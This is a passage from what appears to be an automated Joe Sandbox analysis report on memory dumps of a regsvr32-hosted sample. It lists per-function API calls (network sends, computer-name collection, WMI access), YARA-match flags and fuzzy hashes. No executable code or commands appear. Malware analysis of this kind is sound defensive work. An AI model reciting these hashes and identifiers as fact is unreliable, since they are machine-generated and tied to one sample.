                                                                  • Source File: 00000007.00000002.2916891483.0000000002631000.00000020.10000000.00040000.00000000.sdmp, Offset: 02631000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_2631000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: EventExchangeInterlocked$CloseCurrentObjectSingleThreadTimeWaitclosesocketsendshutdowntime
                                                                  • String ID:
                                                                  • API String ID: 4080316033-0
                                                                  • Opcode ID: 63f5b9e45fe0e2f7b75d6c17ba27ad0f3dddf59e740b33155e987a95ce264ae6
                                                                  • Instruction ID: 0f7856b82a766312c09f535632fd547063a02d85f99d391e376b6f36bd381897
                                                                  • Opcode Fuzzy Hash: 63f5b9e45fe0e2f7b75d6c17ba27ad0f3dddf59e740b33155e987a95ce264ae6
                                                                  • Instruction Fuzzy Hash: 6B216F766407046BD330EF69DC84B9BF3E8EF99720F500A1EE58AC7640DB71B4548BA5
                                                                  Function 02634370 Relevance: 6.1, APIs: 4, Instructions: 70networkCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SetLastError.KERNEL32(0000139F), ref: 026343DC
                                                                    • Part of subcall function 026313A0: RtlAllocateHeap.NTDLL(00000000,00000000,?), ref: 026313CB
                                                                    • Part of subcall function 026341D0: RtlEnterCriticalSection.NTDLL(02634FA5), ref: 026341D8
                                                                    • Part of subcall function 026341D0: RtlLeaveCriticalSection.NTDLL(02634FA5), ref: 026341E6
                                                                    • Part of subcall function 02634C60: HeapFree.KERNEL32(?,00000000,?,00000000,02634E45,?,026342B8,02634E45,00000000,?,?,02634E45,?), ref: 02634C87
                                                                  • SetLastError.KERNEL32(00000000,?), ref: 026343C7
                                                                  • SetLastError.KERNEL32(00000057), ref: 026343F1
                                                                  • WSAGetLastError.WS2_32(?), ref: 02634400
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2916891483.0000000002631000.00000020.10000000.00040000.00000000.sdmp, Offset: 02631000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_2631000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLast$CriticalHeapSection$AllocateEnterFreeLeave
                                                                  • String ID:
                                                                  • API String ID: 2160363220-0
                                                                  • Opcode ID: ea5523d5e75e48e808edcaabeda5bf16bfdb69450dfdea360075c6ad1e475f0d
                                                                  • Instruction ID: 571e0046f3837e7e1a6a8ef32fb7a9e2e99fb56b056871a60fed2263f083d836
                                                                  • Opcode Fuzzy Hash: ea5523d5e75e48e808edcaabeda5bf16bfdb69450dfdea360075c6ad1e475f0d
                                                                  • Instruction Fuzzy Hash: ED11063BA0612C9B9B11EE69B8845EEF7A8EF85732B0445AAED0DE7300DB359D1146D0
                                                                  Function 02633BD0 Relevance: 6.1, APIs: 4, Instructions: 58networkCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • WSAEventSelect.WS2_32(02633A9B,00000001,00000023), ref: 02633BE2
                                                                  • WSAGetLastError.WS2_32 ref: 02633BED
                                                                  • send.WS2_32(00000001,00000000,00000000,00000000), ref: 02633C38
                                                                  • WSAGetLastError.WS2_32 ref: 02633C43
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2916891483.0000000002631000.00000020.10000000.00040000.00000000.sdmp, Offset: 02631000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_2631000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLast$EventSelectsend
                                                                  • String ID:
                                                                  • API String ID: 259408233-0
                                                                  • Opcode ID: 52cb1a8313e9e950cfd4b8a74bdd093a5d46de6401d690088f169c9e091d2718
                                                                  • Instruction ID: 96dfd70249ebf569e2660ead0fff27ecc86ca5e7a6b3249c063b319986388cae
                                                                  • Opcode Fuzzy Hash: 52cb1a8313e9e950cfd4b8a74bdd093a5d46de6401d690088f169c9e091d2718
                                                                  • Instruction Fuzzy Hash: 2711A3B66017009BD3209F79D8C8A4BB7FAFB88710F404A1EEA97C7740C770E8508B50
                                                                  Function 04F8FA0B Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918694072.0000000004F80000.00000040.00000020.00020000.00000000.sdmp, Offset: 04F80000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_4f80000_regsvr32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                  • String ID:
                                                                  • API String ID: 3016257755-0
                                                                  • Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                  • Instruction ID: 158e06f604da39282f6583820bdd484f33028747e187cb05c89b6616bfe7e8bb
                                                                  • Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                  • Instruction Fuzzy Hash: 4B11393241014EBFCF126F84CC55CEE3F62BB1D364B598519FA185A030D336E5B2ABA2
                                                                  Function 0263F336 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2916891483.0000000002631000.00000020.10000000.00040000.00000000.sdmp, Offset: 02631000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_2631000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                  • String ID:
                                                                  • API String ID: 3016257755-0
                                                                  • Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                  • Instruction ID: 3e55a16c715ef2e61582b37800e6019264206480185364ff1b609aa777d2d3f5
                                                                  • Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                  • Instruction Fuzzy Hash: 2111693680014ABBDF175E95CC418EE3F62BF08254F088818FA1898520C33AC9B2AB81
                                                                  Function 04F8E0D3 Relevance: 6.0, APIs: 4, Instructions: 47COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __getptd.LIBCMT ref: 04F8E0DF
                                                                    • Part of subcall function 04F8A108: __getptd_noexit.LIBCMT ref: 04F8A10B
                                                                    • Part of subcall function 04F8A108: __amsg_exit.LIBCMT ref: 04F8A118
                                                                  • __amsg_exit.LIBCMT ref: 04F8E0FF
                                                                  • __lock.LIBCMT ref: 04F8E10F
                                                                  • _free.LIBCMT ref: 04F8E13F
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918694072.0000000004F80000.00000040.00000020.00020000.00000000.sdmp, Offset: 04F80000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_4f80000_regsvr32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: __amsg_exit$__getptd__getptd_noexit__lock_free
                                                                  • String ID:
                                                                  • API String ID: 3170801528-0
                                                                  • Opcode ID: 4cf3b957dde3def4c87ddc975d8c81450a738a2aaffde9ec79113fff7239d67b
                                                                  • Instruction ID: 3c47dccc420d0ce5629cfe8e140378a2425521d5579a7518170cec22806cc873
                                                                  • Opcode Fuzzy Hash: 4cf3b957dde3def4c87ddc975d8c81450a738a2aaffde9ec79113fff7239d67b
                                                                  • Instruction Fuzzy Hash: 6E014032E04A119BEB11BB649C087DEB7A1BF04754F14801EE811EF690DB347983DBD5
                                                                  Function 026341D0 Relevance: 6.0, APIs: 4, Instructions: 46COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • RtlEnterCriticalSection.NTDLL(02634FA5), ref: 026341D8
                                                                  • RtlLeaveCriticalSection.NTDLL(02634FA5), ref: 026341E6
                                                                  • RtlLeaveCriticalSection.NTDLL(02634FA5), ref: 02634247
                                                                  • SetEvent.KERNEL32(8520468B), ref: 02634262
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2916891483.0000000002631000.00000020.10000000.00040000.00000000.sdmp, Offset: 02631000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_2631000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSection$Leave$EnterEvent
                                                                  • String ID:
                                                                  • API String ID: 3394196147-0
                                                                  • Opcode ID: 8438a2a2d9813f7413cdde15393eb1e0696155f3e3572684d148a6ad721bcda9
                                                                  • Instruction ID: ae53d931d87e9ad1a403992ba7ff3d6b46c4e9fc985e337cb2ee9a38d9e900f5
                                                                  • Opcode Fuzzy Hash: 8438a2a2d9813f7413cdde15393eb1e0696155f3e3572684d148a6ad721bcda9
                                                                  • Instruction Fuzzy Hash: AA1103B8A01B009FD725CF74C584ADAB7E9BF48301B54892DE49E87200EB30E841CB40
                                                                  Function 02633640 Relevance: 6.0, APIs: 4, Instructions: 42timeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CreateWaitableTimerW.KERNEL32(00000000,00000000,00000000), ref: 02633647
                                                                  • _free.LIBCMT ref: 0263367C
                                                                    • Part of subcall function 02637009: HeapFree.KERNEL32(00000000,00000000,?,02639A24,00000000,?,0263A0B0,?,00000001,?,?,0263C10B,00000018,02647C70,0000000C,0263C19B), ref: 0263701F
                                                                    • Part of subcall function 02637009: GetLastError.KERNEL32(00000000,?,02639A24,00000000,?,0263A0B0,?,00000001,?,?,0263C10B,00000018,02647C70,0000000C,0263C19B,?), ref: 02637031
                                                                  • _malloc.LIBCMT ref: 026336B7
                                                                  • _memset.LIBCMT ref: 026336C5
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2916891483.0000000002631000.00000020.10000000.00040000.00000000.sdmp, Offset: 02631000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_2631000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: CreateErrorFreeHeapLastTimerWaitable_free_malloc_memset
                                                                  • String ID:
                                                                  • API String ID: 3340475617-0
                                                                  • Opcode ID: 0eafc0aa7e5a22e6a4f0b0f493d649c87a5c4448f5ccb4ca4b73956a8532d84e
                                                                  • Instruction ID: 57deae51fb2a51b8ef79e54f5eabd8bf38505f4da3443d41aae64556c27f6d07
                                                                  • Opcode Fuzzy Hash: 0eafc0aa7e5a22e6a4f0b0f493d649c87a5c4448f5ccb4ca4b73956a8532d84e
                                                                  • Instruction Fuzzy Hash: 9E01D6F5900B44DFE3619F7A9881B97FAE9EB85314F104C2EE5AE83302D734A8048F60
                                                                  Function 04F877AC Relevance: 6.0, APIs: 4, Instructions: 41COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • _malloc.LIBCMT ref: 04F877C6
                                                                    • Part of subcall function 04F87718: __FF_MSGBANNER.LIBCMT ref: 04F87731
                                                                    • Part of subcall function 04F87718: __NMSG_WRITE.LIBCMT ref: 04F87738
                                                                  • std::exception::exception.LIBCMT ref: 04F877FB
                                                                  • std::exception::exception.LIBCMT ref: 04F87815
                                                                  • __CxxThrowException@8.LIBCMT ref: 04F87826
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918694072.0000000004F80000.00000040.00000020.00020000.00000000.sdmp, Offset: 04F80000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_4f80000_regsvr32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: std::exception::exception$Exception@8Throw_malloc
                                                                  • String ID:
                                                                  • API String ID: 2388904642-0
                                                                  • Opcode ID: 7f9ff3607203f8d0e7b58d90a7652ecaa2e8b9615d42c5d69c1e353cf8a40a72
                                                                  • Instruction ID: 67d724c52a2dd726edd0c52d7851401769686e7bc1dd0dad9ea00c3dc962efaf
                                                                  • Opcode Fuzzy Hash: 7f9ff3607203f8d0e7b58d90a7652ecaa2e8b9615d42c5d69c1e353cf8a40a72
                                                                  • Instruction Fuzzy Hash: F6F0A931D042099AEB00FBA4DC41BDD7BE66B41758F34402DD9149F1D0DBB4B692C759
                                                                  Function 02636650 Relevance: 6.0, APIs: 4, Instructions: 36memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 02631420: HeapFree.KERNEL32(?,00000000,?,?,?,026340A1,?,00000000,02634029,?,02645054,02633628), ref: 0263143D
                                                                    • Part of subcall function 02631420: _free.LIBCMT ref: 02631459
                                                                  • HeapDestroy.KERNEL32(00000000), ref: 02636663
                                                                  • HeapCreate.KERNEL32(?,?,?), ref: 02636675
                                                                  • _free.LIBCMT ref: 02636685
                                                                  • HeapDestroy.KERNEL32 ref: 026366B2
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2916891483.0000000002631000.00000020.10000000.00040000.00000000.sdmp, Offset: 02631000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_2631000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$Destroy_free$CreateFree
                                                                  • String ID:
                                                                  • API String ID: 4097506873-0
                                                                  • Opcode ID: 89903acfe8d60dbdf1ff097c077709da85dc6d7b2ef77b1390ffee2e0cc6bdfb
                                                                  • Instruction ID: ae68c7f415545898738dd0329e46378331227cfb090cefa5b8cbf70f8cb4d641
                                                                  • Opcode Fuzzy Hash: 89903acfe8d60dbdf1ff097c077709da85dc6d7b2ef77b1390ffee2e0cc6bdfb
                                                                  • Instruction Fuzzy Hash: 6CF014B9500702ABD7219F25E808B57B7F8FF84B54F20491CE89A83240DB34F8518B94
                                                                  Function 04F87A4B Relevance: 6.0, APIs: 4, Instructions: 34COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918694072.0000000004F80000.00000040.00000020.00020000.00000000.sdmp, Offset: 04F80000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_4f80000_regsvr32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: ___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                                  • String ID:
                                                                  • API String ID: 865245655-0
                                                                  • Opcode ID: 4a06915e8936009563f3bcb273f9b9dd16386e252301183da01dac539c0c6632
                                                                  • Instruction ID: f07d7f95051e5cc967d7981532627e911251b174b1105efb7b9a0ff495fdddf5
                                                                  • Opcode Fuzzy Hash: 4a06915e8936009563f3bcb273f9b9dd16386e252301183da01dac539c0c6632
                                                                  • Instruction Fuzzy Hash: 46F05BB4900645EFD708BFB1CD08DAE7FE9AF88248720C45CE9058F222DA75F9439B95
                                                                  Function 6C87C210 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 174COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetComputerNameExW.KERNEL32(00000005,00000000,00000000,?,?,6C864F0D), ref: 6C87C228
                                                                  • GetComputerNameExW.KERNEL32(00000005,00000002,00000000,00000005,00000000,00000000,?,?,6C864F0D), ref: 6C87C296
                                                                    • Part of subcall function 6C89A6B0: GetLastError.KERNEL32(?,6C86131E,6C8577BC,?,6C8577BC,?,?,?,?,6C851F14,?), ref: 6C89A6B3
                                                                    • Part of subcall function 6C85AC40: HeapFree.KERNEL32(00000000,0000000C), ref: 6C8E9FA8
                                                                  Strings
                                                                  • CurrentBuildNumberCurrentMajorVersionNumber (), xrefs: 6C87C3E7
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: ComputerName$ErrorFreeHeapLast
                                                                  • String ID: CurrentBuildNumberCurrentMajorVersionNumber ()
                                                                  • API String ID: 1552939727-3310863298
                                                                  • Opcode ID: b2b56d593e16f7e418504dd8e7f9da269626866aa52b22932c9807f6a529721d
                                                                  • Instruction ID: 5187f26fd12130d783d72d3056eefa6657e3939aecb945af3b15afa39e1fef96
                                                                  • Opcode Fuzzy Hash: b2b56d593e16f7e418504dd8e7f9da269626866aa52b22932c9807f6a529721d
                                                                  • Instruction Fuzzy Hash: 4051D271D002099BEB30AEE99D85BEF76B8AF1530CF144939D914A7A82F774C94887B1
                                                                  Function 6C861C00 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SysAllocString.OLEAUT32(root\WMI), ref: 6C861C1E
                                                                    • Part of subcall function 6C892680: SysFreeString.OLEAUT32(8904C483), ref: 6C89268D
                                                                  • SysFreeString.OLEAUT32(6C861554), ref: 6C861CA0
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: String$Free$Alloc
                                                                  • String ID: root\WMI
                                                                  • API String ID: 986138563-2712063579
                                                                  • Opcode ID: 82175d924a187a5091170fa10e222aebb22d768b1091c272fc6aa989f5fe68c4
                                                                  • Instruction ID: 81ff864b9f7888c0315ac99dac8fbc7ec8421e01326f1cb09be1dffd8c226031
                                                                  • Opcode Fuzzy Hash: 82175d924a187a5091170fa10e222aebb22d768b1091c272fc6aa989f5fe68c4
                                                                  • Instruction Fuzzy Hash: EB316EB1C0160E9BDF11DFA9D948BDFB7B8BF08308F104925E415B7A01E735AA48CBA1
                                                                  Function 6C9480B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 54COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: free
                                                                  • String ID: %p not found?!?!
                                                                  • API String ID: 1294909896-11085004
                                                                  • Opcode ID: 9e7e12e0f9a67fcc3d3a4064e0478d9c330838a51ce50980fe78e9b630303881
                                                                  • Instruction ID: aeb1051f3905045794ca1c21335f7f9657efaba0926a6e0008d2709893d6dc7a
                                                                  • Opcode Fuzzy Hash: 9e7e12e0f9a67fcc3d3a4064e0478d9c330838a51ce50980fe78e9b630303881
                                                                  • Instruction Fuzzy Hash: 29117CB1608301CFDB44AF6D98C125AB7E8BB29648B15C82FD5C4CBF00DB70D6448B96
                                                                  Function 04F8785F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __output_l.LIBCMT ref: 04F878BA
                                                                    • Part of subcall function 04F879A2: __getptd_noexit.LIBCMT ref: 04F879A2
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918694072.0000000004F80000.00000040.00000020.00020000.00000000.sdmp, Offset: 04F80000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_4f80000_regsvr32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: __getptd_noexit__output_l
                                                                  • String ID: B
                                                                  • API String ID: 2141734944-1255198513
                                                                  • Opcode ID: c8983595ceaa5ba76f605141cca68a1d372402d04fa407bee202103836b82639
                                                                  • Instruction ID: 2d7768cf1dc99b55d3227218752d6ead3c40f8b12d4e11422beb40dfd74e861a
                                                                  • Opcode Fuzzy Hash: c8983595ceaa5ba76f605141cca68a1d372402d04fa407bee202103836b82639
                                                                  • Instruction Fuzzy Hash: A3016171D0420D9BEF10BFA4CC01BEEBBF8FB44364F200119E924AA280D774A502DBA5
                                                                  Function 04F93AD5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918694072.0000000004F80000.00000040.00000020.00020000.00000000.sdmp, Offset: 04F80000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_4f80000_regsvr32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CallFrame@12Setting__getptd
                                                                  • String ID: j
                                                                  • API String ID: 3454690891-2137352139
                                                                  • Opcode ID: f348396704fc7f8bac78ebcdf07e9e8cb48e9860e181cb268830054982e1df9c
                                                                  • Instruction ID: f23f812d7ed20f414e911f1e44ec6b23a8a5149305c66173dfabaeae698a1f71
                                                                  • Opcode Fuzzy Hash: f348396704fc7f8bac78ebcdf07e9e8cb48e9860e181cb268830054982e1df9c
                                                                  • Instruction Fuzzy Hash: 90118C31D09255DEEF11DF68C944398BBB0BB05328F18828AD8A92F1E2C3756953CB81
                                                                  Function 02643400 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2916891483.0000000002631000.00000020.10000000.00040000.00000000.sdmp, Offset: 02631000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_2631000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: CallFrame@12Setting__getptd
                                                                  • String ID: j
                                                                  • API String ID: 3454690891-2137352139
                                                                  • Opcode ID: 2d5c79073739351d5b3842c6d6c1ec2e7c65ba24b1d71476762812d21029c0e0
                                                                  • Instruction ID: 463acc34c8e8acef44c4000ee34976f2a3f40cb41fb72ae0429eec7d6067a5e9
                                                                  • Opcode Fuzzy Hash: 2d5c79073739351d5b3842c6d6c1ec2e7c65ba24b1d71476762812d21029c0e0
                                                                  • Instruction Fuzzy Hash: CC11A0319092909ECB12DF68C5843ACBB70BF01728FA842C9D4E42B6D3CB755962CF95
                                                                  Function 6C8BC070 Relevance: 5.3, APIs: 4, Instructions: 288COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • memcpy.MSVCRT(?,000000B5,?), ref: 6C8BC165
                                                                  • memcpy.MSVCRT(?,00000003,00000002), ref: 6C8BC17B
                                                                  • memcpy.MSVCRT(?,000000B5,?), ref: 6C8BC355
                                                                  • memcpy.MSVCRT(?,00000003,00000002), ref: 6C8BC36B
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: memcpy
                                                                  • String ID:
                                                                  • API String ID: 3510742995-0
                                                                  • Opcode ID: ae03a2a3a508a887f1228bac063574b12fe276091cd23d25991ee57077c1d43a
                                                                  • Instruction ID: e9259124ce64e5046368ee88d5149d5f27af3b123b88346bfeff818e9ed151c4
                                                                  • Opcode Fuzzy Hash: ae03a2a3a508a887f1228bac063574b12fe276091cd23d25991ee57077c1d43a
                                                                  • Instruction Fuzzy Hash: A6C1B175D016099FCB10CF98C880AEEBBB1FF99308F14466ED9087B352E7719916CB90
                                                                  Function 6C948300 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 37COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • fprintf.MSVCRT ref: 6C94837B
                                                                    • Part of subcall function 6C947D40: TlsAlloc.KERNEL32(?,?,6C94832C), ref: 6C947D43
                                                                  Strings
                                                                  • Error cleaning up spin_keys for thread , xrefs: 6C948306
                                                                  • once %p is %d, xrefs: 6C948370
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: Allocfprintf
                                                                  • String ID: once %p is %d$Error cleaning up spin_keys for thread
                                                                  • API String ID: 386651473-1049478869
                                                                  • Opcode ID: eff5c31608cdad04c12fa67f2a142b9b958436bc80c40077a415babd40584a39
                                                                  • Instruction ID: 22149ed2fdd3eedf29d9016870da45659cc817c2319dff96fe3b5615389c3633
                                                                  • Opcode Fuzzy Hash: eff5c31608cdad04c12fa67f2a142b9b958436bc80c40077a415babd40584a39
                                                                  • Instruction Fuzzy Hash: 73F03C722083008AD700BF69994525EBAE9AF62248F11C82ED48487B11EB74C2488B97
                                                                  Function 04F93E6E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __getptd.LIBCMT ref: 04F93E7D
